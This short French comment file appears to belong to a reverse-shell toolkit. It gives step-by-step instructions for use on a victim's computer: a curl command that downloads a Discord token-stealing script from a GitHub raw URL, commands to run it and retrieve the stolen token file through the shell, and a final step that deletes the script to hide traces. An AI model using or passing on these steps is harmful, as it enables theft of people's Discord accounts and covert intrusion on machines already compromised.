# Programme réalisé : Aucune idée, mais pas moi 

# Entrain d'être écrit, via ce programme vous pourrez récuppérer un fichier qui va etre créer sur le pc de la victime avec son token discord sans passsez par un webhook

# Etape 1 :
# A faire sur le pc de la victime
# curl https://raw.githubusercontent.com/DictateurMiro/reverse-shell/main/addons/local/discord-token.pyw -o token.pyw 

# Etape 2 :
# download [Chemin d'acces du fichier] (Regardez le README.md, si vous avez besoin d'aide)

# Etape 3 :
# python token.pyw (dans le dossier Downloads, PS: Pour allez sur le fihicer 'cd .. && cd .. && cd Downloads && python token.pyw', CECI EST UN EXEMPLE TROUVEZ OU EST LE FICHIER en utilisant des DIR)

# Etape 4 :
# del token.pyw

########################################################################################################################################
